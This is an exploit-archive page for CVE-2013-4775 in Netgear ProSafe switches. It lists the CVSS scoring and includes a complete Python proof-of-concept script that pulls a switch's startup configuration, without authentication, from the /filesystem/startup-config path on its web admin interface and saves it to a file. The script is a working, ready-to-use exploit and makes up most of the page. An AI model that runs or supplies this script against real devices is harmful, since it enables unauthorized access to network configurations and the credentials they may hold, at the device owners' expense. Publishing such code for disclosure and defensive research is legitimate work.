Netgear ProSafe Information Disclosure Vulnerability Exploit

2013.08.22
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-200


CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: None
Availability impact: None

import sys, getopt, urllib2 __version__ = "0.1" __author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)" # Prints title and other header info def header(): print "" print " ================================================================= " print "| Netgear ProSafe - CVE-2013-4775 PoC \t\t\t\t |".format(__version__) print "| by {0}\t\t |".format(__author__) print " ================================================================= " print "" # Prints help def help(): header() print """ Usage: python CVE-2013-4775.py [mandatory options] Mandatory options: -t target ...Target IP address -p port ...Port where the HTTP admin interface is listening on -o file ...Output file where the config will be written to Example: python CVE-2013-4775.py -t 192.168.0.1 -p 80 -o output.txt """ sys.exit(0) if __name__ == '__main__': #Parse options try: options, args = getopt.getopt(sys.argv[1:], "t:p:o:", ["target=", "port=", "output="]) except getopt.GetoptError, err: header() print "\n[-] Error: {0}.\n".format(str(err)) sys.exit(1) if not options: help() target = None port = None output = None reset = None for opt, arg in options: if opt in ("-t"): target = arg if opt in ("-p"): port = arg if opt in ("-o"): output = arg #Option input validation if not target or not port or not output: help() print "[-] Error: Incorrect syntax.\n" sys.exit(1) header() print "[+] Trying to connect to {0}:{1}...".format(target, port) headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" } try: # Get the startup config via HTTP admin interface r = urllib2.Request("http://%s:%s/filesystem/startup-config" % (target, port), None, headers) startup_config = urllib2.urlopen(r).read() print "[+] Connected..." # Write results to output file print "[+] Writing startup config to {0}...\n".format(output) fw = open(output, 'w') fw.write(startup_config) fw.close() except urllib2.URLError: print "[-] Error: The connection could not be established.\n" except IOError as e: print "[-] Error: {0}...\n".format(e.strerror) sys.exit(0)

References:

http://cxsecurity.com/issue/WLB-2013080178


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top